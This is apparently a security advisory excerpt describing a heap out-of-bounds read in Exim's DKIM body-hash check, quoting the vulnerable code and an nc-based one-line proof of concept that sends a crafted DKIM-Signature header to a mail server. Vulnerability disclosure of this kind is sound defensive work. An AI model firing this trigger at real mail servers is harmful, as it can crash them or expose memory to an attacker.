========================================================================
CVE-2020-BHASH -- Heap out-of-bounds read in pdkim_finish_bodyhash()
========================================================================

By default since Exim 4.70, receive_msg() calls
dkim_exim_verify_finish() to verify DKIM (DomainKeys Identified Mail)
signatures, which calls pdkim_feed_finish(), which calls
pdkim_finish_bodyhash():

 788 static void
 789 pdkim_finish_bodyhash(pdkim_ctx * ctx)
 790 {
 ...
 799 for (pdkim_signature * sig = ctx->sig; sig; sig = sig->next)
 800   {
 ...
 825     if (  sig->bodyhash.data
 826        && memcmp(b->bh.data, sig->bodyhash.data, b->bh.len) == 0)
 827       {
 ...
 829       }
 830     else
 831       {
 ...
 838       sig->verify_status     = PDKIM_VERIFY_FAIL;
 839       sig->verify_ext_status = PDKIM_VERIFY_FAIL_BODY;
 840       }
 841   }
 842 }

Unfortunately, at line 826 sig->bodyhash.data is attacker-controlled
(through a "DKIM-Signature:" mail header) and memcmp() is called without
checking first that sig->bodyhash.len is equal to b->bh.len: memcmp()
can read sig->bodyhash.data out-of-bounds.

(sleep 10; echo 'EHLO test'; sleep 3; echo 'MAIL FROM:<>'; sleep 3; echo 'RCPT TO:postmaster'; sleep 3; echo 'DATA'; sleep 30; printf 'DKIM-Signature:a=rsa-sha512;bh=QUFB\r\n\r\nXXX\r\n.\r\n'; sleep 30) | nc -n -v 192.168.56.102 25

If the acl_smtp_dkim is set (it is unset by default), an unauthenticated
remote attacker may transform this vulnerability into an information
disclosure; we have not fully explored this possibility.

